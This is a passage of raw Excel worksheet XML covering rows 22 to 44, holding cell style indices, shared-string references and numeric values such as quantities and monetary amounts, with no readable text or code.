      </c>
      <c r="K22" s="259" t="s">
        <v>4191</v>
      </c>
      <c r="L22" s="47"/>
      <c r="M22" s="47"/>
      <c r="N22" s="47"/>
      <c r="O22" s="47"/>
      <c r="P22" s="47"/>
      <c r="Q22" s="47"/>
      <c r="R22" s="47"/>
      <c r="S22" s="47"/>
      <c r="T22" s="47"/>
      <c r="U22" s="47"/>
      <c r="V22" s="47"/>
      <c r="W22" s="47"/>
      <c r="X22" s="47"/>
      <c r="Y22" s="47"/>
      <c r="Z22" s="47"/>
      <c r="AA22" s="47"/>
      <c r="AB22" s="47"/>
      <c r="AC22" s="47"/>
      <c r="AD22" s="47"/>
      <c r="AE22" s="47"/>
      <c r="AF22" s="47"/>
      <c r="AG22" s="47"/>
    </row>
    <row r="23" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A23" s="25"/>
      <c r="B23" s="23">
        <v>92</v>
      </c>
      <c r="C23" s="257" t="s">
        <v>4192</v>
      </c>
      <c r="D23" s="258" t="s">
        <v>2663</v>
      </c>
      <c r="E23" s="258" t="s">
        <v>4193</v>
      </c>
      <c r="F23" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G23" s="36">
        <v>1</v>
      </c>
      <c r="H23" s="257" t="s">
        <v>326</v>
      </c>
      <c r="I23" s="67">
        <v>26000</v>
      </c>
      <c r="J23" s="50">
        <v>5000</v>
      </c>
      <c r="K23" s="259" t="s">
        <v>4167</v>
      </c>
      <c r="L23" s="47"/>
      <c r="M23" s="47"/>
      <c r="N23" s="47"/>
      <c r="O23" s="47"/>
      <c r="P23" s="47"/>
      <c r="Q23" s="47"/>
      <c r="R23" s="47"/>
      <c r="S23" s="47"/>
      <c r="T23" s="47"/>
      <c r="U23" s="47"/>
      <c r="V23" s="47"/>
      <c r="W23" s="47"/>
      <c r="X23" s="47"/>
      <c r="Y23" s="47"/>
      <c r="Z23" s="47"/>
      <c r="AA23" s="47"/>
      <c r="AB23" s="47"/>
      <c r="AC23" s="47"/>
      <c r="AD23" s="47"/>
      <c r="AE23" s="47"/>
      <c r="AF23" s="47"/>
      <c r="AG23" s="47"/>
    </row>
    <row r="24" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A24" s="25"/>
      <c r="B24" s="23">
        <v>94</v>
      </c>
      <c r="C24" s="257" t="s">
        <v>4194</v>
      </c>
      <c r="D24" s="258" t="s">
        <v>4195</v>
      </c>
      <c r="E24" s="258" t="s">
        <v>4196</v>
      </c>
      <c r="F24" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G24" s="36">
        <v>5</v>
      </c>
      <c r="H24" s="257" t="s">
        <v>326</v>
      </c>
      <c r="I24" s="67">
        <v>337500</v>
      </c>
      <c r="J24" s="50">
        <v>64000</v>
      </c>
      <c r="K24" s="259" t="s">
        <v>4167</v>
      </c>
      <c r="L24" s="47"/>
      <c r="M24" s="47"/>
      <c r="N24" s="47"/>
      <c r="O24" s="47"/>
      <c r="P24" s="47"/>
      <c r="Q24" s="47"/>
      <c r="R24" s="47"/>
      <c r="S24" s="47"/>
      <c r="T24" s="47"/>
      <c r="U24" s="47"/>
      <c r="V24" s="47"/>
      <c r="W24" s="47"/>
      <c r="X24" s="47"/>
      <c r="Y24" s="47"/>
      <c r="Z24" s="47"/>
      <c r="AA24" s="47"/>
      <c r="AB24" s="47"/>
      <c r="AC24" s="47"/>
      <c r="AD24" s="47"/>
      <c r="AE24" s="47"/>
      <c r="AF24" s="47"/>
      <c r="AG24" s="47"/>
    </row>
    <row r="25" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A25" s="25"/>
      <c r="B25" s="23">
        <v>95</v>
      </c>
      <c r="C25" s="257" t="s">
        <v>4197</v>
      </c>
      <c r="D25" s="258" t="s">
        <v>4198</v>
      </c>
      <c r="E25" s="258" t="s">
        <v>4199</v>
      </c>
      <c r="F25" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G25" s="36">
        <v>1</v>
      </c>
      <c r="H25" s="257" t="s">
        <v>326</v>
      </c>
      <c r="I25" s="67">
        <v>300000</v>
      </c>
      <c r="J25" s="50">
        <v>56000</v>
      </c>
      <c r="K25" s="259" t="s">
        <v>4167</v>
      </c>
      <c r="L25" s="25"/>
      <c r="M25" s="25"/>
      <c r="N25" s="47"/>
      <c r="O25" s="47"/>
      <c r="P25" s="47"/>
      <c r="Q25" s="47"/>
      <c r="R25" s="47"/>
      <c r="S25" s="47"/>
      <c r="T25" s="47"/>
      <c r="U25" s="47"/>
      <c r="V25" s="47"/>
      <c r="W25" s="47"/>
      <c r="X25" s="47"/>
      <c r="Y25" s="47"/>
      <c r="Z25" s="47"/>
      <c r="AA25" s="47"/>
      <c r="AB25" s="47"/>
      <c r="AC25" s="47"/>
      <c r="AD25" s="47"/>
      <c r="AE25" s="47"/>
      <c r="AF25" s="47"/>
      <c r="AG25" s="47"/>
    </row>
    <row r="26" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A26" s="25"/>
      <c r="B26" s="23">
        <v>97</v>
      </c>
      <c r="C26" s="257" t="s">
        <v>4200</v>
      </c>
      <c r="D26" s="258" t="s">
        <v>4201</v>
      </c>
      <c r="E26" s="258" t="s">
        <v>4202</v>
      </c>
      <c r="F26" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G26" s="36">
        <v>2</v>
      </c>
      <c r="H26" s="257" t="s">
        <v>1094</v>
      </c>
      <c r="I26" s="67">
        <v>180000</v>
      </c>
      <c r="J26" s="50">
        <v>36000</v>
      </c>
      <c r="K26" s="259" t="s">
        <v>4159</v>
      </c>
      <c r="L26" s="25"/>
      <c r="M26" s="25"/>
      <c r="N26" s="47"/>
      <c r="O26" s="47"/>
      <c r="P26" s="47"/>
      <c r="Q26" s="47"/>
      <c r="R26" s="47"/>
      <c r="S26" s="47"/>
      <c r="T26" s="47"/>
      <c r="U26" s="47"/>
      <c r="V26" s="47"/>
      <c r="W26" s="47"/>
      <c r="X26" s="47"/>
      <c r="Y26" s="47"/>
      <c r="Z26" s="47"/>
      <c r="AA26" s="47"/>
      <c r="AB26" s="47"/>
      <c r="AC26" s="47"/>
      <c r="AD26" s="47"/>
      <c r="AE26" s="47"/>
      <c r="AF26" s="47"/>
      <c r="AG26" s="47"/>
    </row>
    <row r="27" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A27" s="25"/>
      <c r="B27" s="23">
        <v>98</v>
      </c>
      <c r="C27" s="257" t="s">
        <v>4203</v>
      </c>
      <c r="D27" s="258" t="s">
        <v>1092</v>
      </c>
      <c r="E27" s="258" t="s">
        <v>4204</v>
      </c>
      <c r="F27" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G27" s="36">
        <v>1</v>
      </c>
      <c r="H27" s="257" t="s">
        <v>1094</v>
      </c>
      <c r="I27" s="67">
        <v>4200</v>
      </c>
      <c r="J27" s="50">
        <v>160</v>
      </c>
      <c r="K27" s="259" t="s">
        <v>4167</v>
      </c>
      <c r="L27" s="25"/>
      <c r="M27" s="25"/>
      <c r="N27" s="47"/>
      <c r="O27" s="47"/>
      <c r="P27" s="47"/>
      <c r="Q27" s="47"/>
      <c r="R27" s="47"/>
      <c r="S27" s="47"/>
      <c r="T27" s="47"/>
      <c r="U27" s="47"/>
      <c r="V27" s="47"/>
      <c r="W27" s="47"/>
      <c r="X27" s="47"/>
      <c r="Y27" s="47"/>
      <c r="Z27" s="47"/>
      <c r="AA27" s="47"/>
      <c r="AB27" s="47"/>
      <c r="AC27" s="47"/>
      <c r="AD27" s="47"/>
      <c r="AE27" s="47"/>
      <c r="AF27" s="47"/>
      <c r="AG27" s="47"/>
    </row>
    <row r="28" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A28" s="25"/>
      <c r="B28" s="23">
        <v>99</v>
      </c>
      <c r="C28" s="257" t="s">
        <v>4205</v>
      </c>
      <c r="D28" s="258" t="s">
        <v>4206</v>
      </c>
      <c r="E28" s="66"/>
      <c r="F28" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G28" s="36">
        <v>1</v>
      </c>
      <c r="H28" s="257" t="s">
        <v>1094</v>
      </c>
      <c r="I28" s="67">
        <v>701452.99</v>
      </c>
      <c r="J28" s="50">
        <v>72000</v>
      </c>
      <c r="K28" s="259" t="s">
        <v>4167</v>
      </c>
      <c r="L28" s="25"/>
      <c r="M28" s="25"/>
      <c r="N28" s="47"/>
      <c r="O28" s="47"/>
      <c r="P28" s="47"/>
      <c r="Q28" s="47"/>
      <c r="R28" s="47"/>
      <c r="S28" s="47"/>
      <c r="T28" s="47"/>
      <c r="U28" s="47"/>
      <c r="V28" s="47"/>
      <c r="W28" s="47"/>
      <c r="X28" s="47"/>
      <c r="Y28" s="47"/>
      <c r="Z28" s="47"/>
      <c r="AA28" s="47"/>
      <c r="AB28" s="47"/>
      <c r="AC28" s="47"/>
      <c r="AD28" s="47"/>
      <c r="AE28" s="47"/>
      <c r="AF28" s="47"/>
      <c r="AG28" s="47"/>
    </row>
    <row r="29" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A29" s="25"/>
      <c r="B29" s="23">
        <v>100</v>
      </c>
      <c r="C29" s="257" t="s">
        <v>4207</v>
      </c>
      <c r="D29" s="258" t="s">
        <v>334</v>
      </c>
      <c r="E29" s="258" t="s">
        <v>4208</v>
      </c>
      <c r="F29" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G29" s="36">
        <v>1</v>
      </c>
      <c r="H29" s="257" t="s">
        <v>3161</v>
      </c>
      <c r="I29" s="67">
        <v>23000</v>
      </c>
      <c r="J29" s="50">
        <v>2392</v>
      </c>
      <c r="K29" s="259" t="s">
        <v>4209</v>
      </c>
      <c r="L29" s="25"/>
      <c r="M29" s="25"/>
      <c r="N29" s="47"/>
      <c r="O29" s="47"/>
      <c r="P29" s="47"/>
      <c r="Q29" s="47"/>
      <c r="R29" s="47"/>
      <c r="S29" s="47"/>
      <c r="T29" s="47"/>
      <c r="U29" s="47"/>
      <c r="V29" s="47"/>
      <c r="W29" s="47"/>
      <c r="X29" s="47"/>
      <c r="Y29" s="47"/>
      <c r="Z29" s="47"/>
      <c r="AA29" s="47"/>
      <c r="AB29" s="47"/>
      <c r="AC29" s="47"/>
      <c r="AD29" s="47"/>
      <c r="AE29" s="47"/>
      <c r="AF29" s="47"/>
      <c r="AG29" s="47"/>
    </row>
    <row r="30" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A30" s="25"/>
      <c r="B30" s="23">
        <v>101</v>
      </c>
      <c r="C30" s="257" t="s">
        <v>4210</v>
      </c>
      <c r="D30" s="258" t="s">
        <v>334</v>
      </c>
      <c r="E30" s="258" t="s">
        <v>4211</v>
      </c>
      <c r="F30" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G30" s="36">
        <v>1</v>
      </c>
      <c r="H30" s="257" t="s">
        <v>3157</v>
      </c>
      <c r="I30" s="67">
        <v>83000</v>
      </c>
      <c r="J30" s="50">
        <v>8632</v>
      </c>
      <c r="K30" s="259" t="s">
        <v>4209</v>
      </c>
      <c r="L30" s="47"/>
      <c r="M30" s="47"/>
      <c r="N30" s="47"/>
      <c r="O30" s="47"/>
      <c r="P30" s="47"/>
      <c r="Q30" s="47"/>
      <c r="R30" s="47"/>
      <c r="S30" s="47"/>
      <c r="T30" s="47"/>
      <c r="U30" s="47"/>
      <c r="V30" s="47"/>
      <c r="W30" s="47"/>
      <c r="X30" s="47"/>
      <c r="Y30" s="47"/>
      <c r="Z30" s="47"/>
      <c r="AA30" s="47"/>
      <c r="AB30" s="47"/>
      <c r="AC30" s="47"/>
      <c r="AD30" s="47"/>
      <c r="AE30" s="47"/>
      <c r="AF30" s="47"/>
      <c r="AG30" s="47"/>
    </row>
    <row r="31" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A31" s="25"/>
      <c r="B31" s="23">
        <v>102</v>
      </c>
      <c r="C31" s="257" t="s">
        <v>4212</v>
      </c>
      <c r="D31" s="258" t="s">
        <v>334</v>
      </c>
      <c r="E31" s="258" t="s">
        <v>4213</v>
      </c>
      <c r="F31" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G31" s="36">
        <v>1</v>
      </c>
      <c r="H31" s="257" t="s">
        <v>3157</v>
      </c>
      <c r="I31" s="67">
        <v>218000</v>
      </c>
      <c r="J31" s="50">
        <v>21840</v>
      </c>
      <c r="K31" s="259" t="s">
        <v>4209</v>
      </c>
      <c r="L31" s="47"/>
      <c r="M31" s="47"/>
      <c r="N31" s="47"/>
      <c r="O31" s="47"/>
      <c r="P31" s="47"/>
      <c r="Q31" s="47"/>
      <c r="R31" s="47"/>
      <c r="S31" s="47"/>
      <c r="T31" s="47"/>
      <c r="U31" s="47"/>
      <c r="V31" s="47"/>
      <c r="W31" s="47"/>
      <c r="X31" s="47"/>
      <c r="Y31" s="47"/>
      <c r="Z31" s="47"/>
      <c r="AA31" s="47"/>
      <c r="AB31" s="47"/>
      <c r="AC31" s="47"/>
      <c r="AD31" s="47"/>
      <c r="AE31" s="47"/>
      <c r="AF31" s="47"/>
      <c r="AG31" s="47"/>
    </row>
    <row r="32" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A32" s="25"/>
      <c r="B32" s="23">
        <v>103</v>
      </c>
      <c r="C32" s="257" t="s">
        <v>4214</v>
      </c>
      <c r="D32" s="258" t="s">
        <v>4215</v>
      </c>
      <c r="E32" s="258" t="s">
        <v>4216</v>
      </c>
      <c r="F32" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G32" s="36">
        <v>1</v>
      </c>
      <c r="H32" s="257" t="s">
        <v>3161</v>
      </c>
      <c r="I32" s="67">
        <v>75000</v>
      </c>
      <c r="J32" s="50">
        <v>18000</v>
      </c>
      <c r="K32" s="259" t="s">
        <v>4209</v>
      </c>
      <c r="L32" s="47"/>
      <c r="M32" s="47"/>
      <c r="N32" s="47"/>
      <c r="O32" s="47"/>
      <c r="P32" s="47"/>
      <c r="Q32" s="47"/>
      <c r="R32" s="47"/>
      <c r="S32" s="47"/>
      <c r="T32" s="47"/>
      <c r="U32" s="47"/>
      <c r="V32" s="47"/>
      <c r="W32" s="47"/>
      <c r="X32" s="47"/>
      <c r="Y32" s="47"/>
      <c r="Z32" s="47"/>
      <c r="AA32" s="47"/>
      <c r="AB32" s="47"/>
      <c r="AC32" s="47"/>
      <c r="AD32" s="47"/>
      <c r="AE32" s="47"/>
      <c r="AF32" s="47"/>
      <c r="AG32" s="47"/>
    </row>
    <row r="33" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A33" s="25"/>
      <c r="B33" s="23">
        <v>104</v>
      </c>
      <c r="C33" s="257" t="s">
        <v>4217</v>
      </c>
      <c r="D33" s="258" t="s">
        <v>4218</v>
      </c>
      <c r="E33" s="258" t="s">
        <v>4219</v>
      </c>
      <c r="F33" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G33" s="36">
        <v>2</v>
      </c>
      <c r="H33" s="257" t="s">
        <v>3161</v>
      </c>
      <c r="I33" s="67">
        <v>83076.92</v>
      </c>
      <c r="J33" s="50">
        <v>15272</v>
      </c>
      <c r="K33" s="259" t="s">
        <v>4209</v>
      </c>
      <c r="L33" s="47"/>
      <c r="M33" s="47"/>
      <c r="N33" s="47"/>
      <c r="O33" s="47"/>
      <c r="P33" s="47"/>
      <c r="Q33" s="47"/>
      <c r="R33" s="47"/>
      <c r="S33" s="47"/>
      <c r="T33" s="47"/>
      <c r="U33" s="47"/>
      <c r="V33" s="47"/>
      <c r="W33" s="47"/>
      <c r="X33" s="47"/>
      <c r="Y33" s="47"/>
      <c r="Z33" s="47"/>
      <c r="AA33" s="47"/>
      <c r="AB33" s="47"/>
      <c r="AC33" s="47"/>
      <c r="AD33" s="47"/>
      <c r="AE33" s="47"/>
      <c r="AF33" s="47"/>
      <c r="AG33" s="47"/>
    </row>
    <row r="34" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A34" s="25"/>
      <c r="B34" s="23">
        <v>109</v>
      </c>
      <c r="C34" s="257" t="s">
        <v>4220</v>
      </c>
      <c r="D34" s="258" t="s">
        <v>3118</v>
      </c>
      <c r="E34" s="258" t="s">
        <v>4221</v>
      </c>
      <c r="F34" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G34" s="36">
        <v>1</v>
      </c>
      <c r="H34" s="257" t="s">
        <v>336</v>
      </c>
      <c r="I34" s="67">
        <v>248000</v>
      </c>
      <c r="J34" s="50">
        <v>59520</v>
      </c>
      <c r="K34" s="259" t="s">
        <v>4209</v>
      </c>
      <c r="L34" s="47"/>
      <c r="M34" s="47"/>
      <c r="N34" s="47"/>
      <c r="O34" s="47"/>
      <c r="P34" s="47"/>
      <c r="Q34" s="47"/>
      <c r="R34" s="47"/>
      <c r="S34" s="47"/>
      <c r="T34" s="47"/>
      <c r="U34" s="47"/>
      <c r="V34" s="47"/>
      <c r="W34" s="47"/>
      <c r="X34" s="47"/>
      <c r="Y34" s="47"/>
      <c r="Z34" s="47"/>
      <c r="AA34" s="47"/>
      <c r="AB34" s="47"/>
      <c r="AC34" s="47"/>
      <c r="AD34" s="47"/>
      <c r="AE34" s="47"/>
      <c r="AF34" s="47"/>
      <c r="AG34" s="47"/>
    </row>
    <row r="35" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A35" s="25"/>
      <c r="B35" s="23">
        <v>110</v>
      </c>
      <c r="C35" s="257" t="s">
        <v>4222</v>
      </c>
      <c r="D35" s="258" t="s">
        <v>4223</v>
      </c>
      <c r="E35" s="258" t="s">
        <v>4224</v>
      </c>
      <c r="F35" s="36" t="s">
        <v>466</v>
      </c>
      <c r="G35" s="36">
        <v>1</v>
      </c>
      <c r="H35" s="257" t="s">
        <v>2152</v>
      </c>
      <c r="I35" s="67">
        <v>58000</v>
      </c>
      <c r="J35" s="50">
        <v>10672</v>
      </c>
      <c r="K35" s="259" t="s">
        <v>4167</v>
      </c>
      <c r="L35" s="47"/>
      <c r="M35" s="47"/>
      <c r="N35" s="47"/>
      <c r="O35" s="47"/>
      <c r="P35" s="47"/>
      <c r="Q35" s="47"/>
      <c r="R35" s="47"/>
      <c r="S35" s="47"/>
      <c r="T35" s="47"/>
      <c r="U35" s="47"/>
      <c r="V35" s="47"/>
      <c r="W35" s="47"/>
      <c r="X35" s="47"/>
      <c r="Y35" s="47"/>
      <c r="Z35" s="47"/>
      <c r="AA35" s="47"/>
      <c r="AB35" s="47"/>
      <c r="AC35" s="47"/>
      <c r="AD35" s="47"/>
      <c r="AE35" s="47"/>
      <c r="AF35" s="47"/>
      <c r="AG35" s="47"/>
    </row>
    <row r="36" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A36" s="25"/>
      <c r="B36" s="23">
        <v>111</v>
      </c>
      <c r="C36" s="257" t="s">
        <v>4225</v>
      </c>
      <c r="D36" s="258" t="s">
        <v>4226</v>
      </c>
      <c r="E36" s="66"/>
      <c r="F36" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G36" s="36">
        <v>1</v>
      </c>
      <c r="H36" s="257" t="s">
        <v>2152</v>
      </c>
      <c r="I36" s="67">
        <v>313000</v>
      </c>
      <c r="J36" s="50">
        <v>55200</v>
      </c>
      <c r="K36" s="259" t="s">
        <v>4159</v>
      </c>
      <c r="L36" s="47"/>
      <c r="M36" s="47"/>
      <c r="N36" s="47"/>
      <c r="O36" s="47"/>
      <c r="P36" s="47"/>
      <c r="Q36" s="47"/>
      <c r="R36" s="47"/>
      <c r="S36" s="47"/>
      <c r="T36" s="47"/>
      <c r="U36" s="47"/>
      <c r="V36" s="47"/>
      <c r="W36" s="47"/>
      <c r="X36" s="47"/>
      <c r="Y36" s="47"/>
      <c r="Z36" s="47"/>
      <c r="AA36" s="47"/>
      <c r="AB36" s="47"/>
      <c r="AC36" s="47"/>
      <c r="AD36" s="47"/>
      <c r="AE36" s="47"/>
      <c r="AF36" s="47"/>
      <c r="AG36" s="47"/>
    </row>
    <row r="37" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A37" s="25"/>
      <c r="B37" s="23">
        <v>112</v>
      </c>
      <c r="C37" s="257" t="s">
        <v>4227</v>
      </c>
      <c r="D37" s="258" t="s">
        <v>334</v>
      </c>
      <c r="E37" s="258" t="s">
        <v>4228</v>
      </c>
      <c r="F37" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G37" s="36">
        <v>2</v>
      </c>
      <c r="H37" s="257" t="s">
        <v>339</v>
      </c>
      <c r="I37" s="67">
        <v>456000</v>
      </c>
      <c r="J37" s="50">
        <v>63648</v>
      </c>
      <c r="K37" s="259" t="s">
        <v>4167</v>
      </c>
      <c r="L37" s="47"/>
      <c r="M37" s="47"/>
      <c r="N37" s="47"/>
      <c r="O37" s="47"/>
      <c r="P37" s="47"/>
      <c r="Q37" s="47"/>
      <c r="R37" s="47"/>
      <c r="S37" s="47"/>
      <c r="T37" s="47"/>
      <c r="U37" s="47"/>
      <c r="V37" s="47"/>
      <c r="W37" s="47"/>
      <c r="X37" s="47"/>
      <c r="Y37" s="47"/>
      <c r="Z37" s="47"/>
      <c r="AA37" s="47"/>
      <c r="AB37" s="47"/>
      <c r="AC37" s="47"/>
      <c r="AD37" s="47"/>
      <c r="AE37" s="47"/>
      <c r="AF37" s="47"/>
      <c r="AG37" s="47"/>
    </row>
    <row r="38" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A38" s="25"/>
      <c r="B38" s="23">
        <v>113</v>
      </c>
      <c r="C38" s="257" t="s">
        <v>4229</v>
      </c>
      <c r="D38" s="258" t="s">
        <v>4230</v>
      </c>
      <c r="E38" s="258" t="s">
        <v>4231</v>
      </c>
      <c r="F38" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G38" s="36">
        <v>1</v>
      </c>
      <c r="H38" s="257" t="s">
        <v>339</v>
      </c>
      <c r="I38" s="67">
        <v>125000</v>
      </c>
      <c r="J38" s="50">
        <v>23000</v>
      </c>
      <c r="K38" s="259" t="s">
        <v>2330</v>
      </c>
      <c r="L38" s="25"/>
      <c r="M38" s="25"/>
      <c r="N38" s="47"/>
      <c r="O38" s="47"/>
      <c r="P38" s="47"/>
      <c r="Q38" s="47"/>
      <c r="R38" s="47"/>
      <c r="S38" s="47"/>
      <c r="T38" s="47"/>
      <c r="U38" s="47"/>
      <c r="V38" s="47"/>
      <c r="W38" s="47"/>
      <c r="X38" s="47"/>
      <c r="Y38" s="47"/>
      <c r="Z38" s="47"/>
      <c r="AA38" s="47"/>
      <c r="AB38" s="47"/>
      <c r="AC38" s="47"/>
      <c r="AD38" s="47"/>
      <c r="AE38" s="47"/>
      <c r="AF38" s="47"/>
      <c r="AG38" s="47"/>
    </row>
    <row r="39" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A39" s="25"/>
      <c r="B39" s="23">
        <v>115</v>
      </c>
      <c r="C39" s="257" t="s">
        <v>4232</v>
      </c>
      <c r="D39" s="258" t="s">
        <v>4233</v>
      </c>
      <c r="E39" s="66"/>
      <c r="F39" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G39" s="36">
        <v>1</v>
      </c>
      <c r="H39" s="257" t="s">
        <v>339</v>
      </c>
      <c r="I39" s="67">
        <v>94000</v>
      </c>
      <c r="J39" s="50">
        <v>936</v>
      </c>
      <c r="K39" s="259" t="s">
        <v>2330</v>
      </c>
      <c r="L39" s="25"/>
      <c r="M39" s="25"/>
      <c r="N39" s="47"/>
      <c r="O39" s="47"/>
      <c r="P39" s="47"/>
      <c r="Q39" s="47"/>
      <c r="R39" s="47"/>
      <c r="S39" s="47"/>
      <c r="T39" s="47"/>
      <c r="U39" s="47"/>
      <c r="V39" s="47"/>
      <c r="W39" s="47"/>
      <c r="X39" s="47"/>
      <c r="Y39" s="47"/>
      <c r="Z39" s="47"/>
      <c r="AA39" s="47"/>
      <c r="AB39" s="47"/>
      <c r="AC39" s="47"/>
      <c r="AD39" s="47"/>
      <c r="AE39" s="47"/>
      <c r="AF39" s="47"/>
      <c r="AG39" s="47"/>
    </row>
    <row r="40" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A40" s="25"/>
      <c r="B40" s="23">
        <v>116</v>
      </c>
      <c r="C40" s="257" t="s">
        <v>4234</v>
      </c>
      <c r="D40" s="258" t="s">
        <v>4166</v>
      </c>
      <c r="E40" s="258" t="s">
        <v>792</v>
      </c>
      <c r="F40" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G40" s="36">
        <v>2</v>
      </c>
      <c r="H40" s="257" t="s">
        <v>339</v>
      </c>
      <c r="I40" s="67">
        <v>20000</v>
      </c>
      <c r="J40" s="50">
        <v>4800</v>
      </c>
      <c r="K40" s="259" t="s">
        <v>4167</v>
      </c>
      <c r="L40" s="25"/>
      <c r="M40" s="25"/>
      <c r="N40" s="47"/>
      <c r="O40" s="47"/>
      <c r="P40" s="47"/>
      <c r="Q40" s="47"/>
      <c r="R40" s="47"/>
      <c r="S40" s="47"/>
      <c r="T40" s="47"/>
      <c r="U40" s="47"/>
      <c r="V40" s="47"/>
      <c r="W40" s="47"/>
      <c r="X40" s="47"/>
      <c r="Y40" s="47"/>
      <c r="Z40" s="47"/>
      <c r="AA40" s="47"/>
      <c r="AB40" s="47"/>
      <c r="AC40" s="47"/>
      <c r="AD40" s="47"/>
      <c r="AE40" s="47"/>
      <c r="AF40" s="47"/>
      <c r="AG40" s="47"/>
    </row>
    <row r="41" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A41" s="25"/>
      <c r="B41" s="23">
        <v>117</v>
      </c>
      <c r="C41" s="257" t="s">
        <v>4235</v>
      </c>
      <c r="D41" s="258" t="s">
        <v>4236</v>
      </c>
      <c r="E41" s="66"/>
      <c r="F41" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G41" s="36">
        <v>1</v>
      </c>
      <c r="H41" s="257" t="s">
        <v>4237</v>
      </c>
      <c r="I41" s="67">
        <v>40500</v>
      </c>
      <c r="J41" s="50">
        <v>1600</v>
      </c>
      <c r="K41" s="259" t="s">
        <v>4167</v>
      </c>
      <c r="L41" s="25"/>
      <c r="M41" s="25"/>
      <c r="N41" s="47"/>
      <c r="O41" s="47"/>
      <c r="P41" s="47"/>
      <c r="Q41" s="47"/>
      <c r="R41" s="47"/>
      <c r="S41" s="47"/>
      <c r="T41" s="47"/>
      <c r="U41" s="47"/>
      <c r="V41" s="47"/>
      <c r="W41" s="47"/>
      <c r="X41" s="47"/>
      <c r="Y41" s="47"/>
      <c r="Z41" s="47"/>
      <c r="AA41" s="47"/>
      <c r="AB41" s="47"/>
      <c r="AC41" s="47"/>
      <c r="AD41" s="47"/>
      <c r="AE41" s="47"/>
      <c r="AF41" s="47"/>
      <c r="AG41" s="47"/>
    </row>
    <row r="42" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A42" s="25"/>
      <c r="B42" s="23">
        <v>118</v>
      </c>
      <c r="C42" s="257" t="s">
        <v>4238</v>
      </c>
      <c r="D42" s="258" t="s">
        <v>4239</v>
      </c>
      <c r="E42" s="66"/>
      <c r="F42" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G42" s="36">
        <v>1</v>
      </c>
      <c r="H42" s="257" t="s">
        <v>4237</v>
      </c>
      <c r="I42" s="67">
        <v>53400</v>
      </c>
      <c r="J42" s="50">
        <v>12000</v>
      </c>
      <c r="K42" s="259" t="s">
        <v>4209</v>
      </c>
      <c r="L42" s="47"/>
      <c r="M42" s="47"/>
      <c r="N42" s="47"/>
      <c r="O42" s="47"/>
      <c r="P42" s="47"/>
      <c r="Q42" s="47"/>
      <c r="R42" s="47"/>
      <c r="S42" s="47"/>
      <c r="T42" s="47"/>
      <c r="U42" s="47"/>
      <c r="V42" s="47"/>
      <c r="W42" s="47"/>
      <c r="X42" s="47"/>
      <c r="Y42" s="47"/>
      <c r="Z42" s="47"/>
      <c r="AA42" s="47"/>
      <c r="AB42" s="47"/>
      <c r="AC42" s="47"/>
      <c r="AD42" s="47"/>
      <c r="AE42" s="47"/>
      <c r="AF42" s="47"/>
      <c r="AG42" s="47"/>
    </row>
    <row r="43" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A43" s="25"/>
      <c r="B43" s="23">
        <v>119</v>
      </c>
      <c r="C43" s="257" t="s">
        <v>4240</v>
      </c>
      <c r="D43" s="258" t="s">
        <v>4241</v>
      </c>
      <c r="E43" s="66"/>
      <c r="F43" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G43" s="36">
        <v>1</v>
      </c>
      <c r="H43" s="257" t="s">
        <v>4237</v>
      </c>
      <c r="I43" s="67">
        <v>21100</v>
      </c>
      <c r="J43" s="50">
        <v>4800</v>
      </c>
      <c r="K43" s="259" t="s">
        <v>4209</v>
      </c>
      <c r="L43" s="47"/>
      <c r="M43" s="47"/>
      <c r="N43" s="47"/>
      <c r="O43" s="47"/>
      <c r="P43" s="47"/>
      <c r="Q43" s="47"/>
      <c r="R43" s="47"/>
      <c r="S43" s="47"/>
      <c r="T43" s="47"/>
      <c r="U43" s="47"/>
      <c r="V43" s="47"/>
      <c r="W43" s="47"/>
      <c r="X43" s="47"/>
      <c r="Y43" s="47"/>
      <c r="Z43" s="47"/>
      <c r="AA43" s="47"/>
      <c r="AB43" s="47"/>
      <c r="AC43" s="47"/>
      <c r="AD43" s="47"/>
      <c r="AE43" s="47"/>
      <c r="AF43" s="47"/>
      <c r="AG43" s="47"/>
    </row>
    <row r="44" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A44" s="25"/>
      <c r="B44" s="23">
        <v>120</v>
      </c>
      <c r="C44" s="257" t="s">
        <v>4242</v>
      </c>
      <c r="D44" s="258" t="s">
        <v>2264</v>
      </c>
      <c r="E44" s="258" t="s">
